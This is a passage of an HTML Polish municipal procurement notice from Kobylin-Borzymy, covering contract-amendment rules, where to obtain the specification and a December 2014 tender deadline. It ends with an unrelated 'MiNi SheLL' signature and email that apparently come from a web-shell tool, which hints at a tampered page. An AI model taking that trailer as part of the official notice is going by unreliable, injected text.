5. Warunkiem dokonania zmian, o których mowa w pkt 4, jest złożenie wniosku przez stronę inicjującą zmianę, zawierającego opis zmiany i uzasadnienie zmiany.
6. Zmiana postanowień umowy może nastąpić wyłącznie w formie pisemnego aneksu pod rygorem nieważności.</p>
<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> www.kobylinborzymy.biuletyn.net<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Urząd Gminy Kobylin-Borzymy
ul. Główna 11
18-204 Kobylin-Borzymy
lub pobrać ze strony internetowej www.kobylinborzymy.biuletyn.net.</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 09.12.2014 godzina 10:00, miejsce: Urząd Gminy Kobylin-Borzymy
ul. Główna 11
18-204 Kobylin-Borzymy
sekretariat.</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>




<p><b>IV.4.16) Informacje dodatkowe, w tym dotyczące finansowania projektu/programu ze środków Unii Europejskiej:</b> nie dotyczy.</p>
<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> nie</p>

Creat By MiNi SheLL
Email: jattceo@gmail.com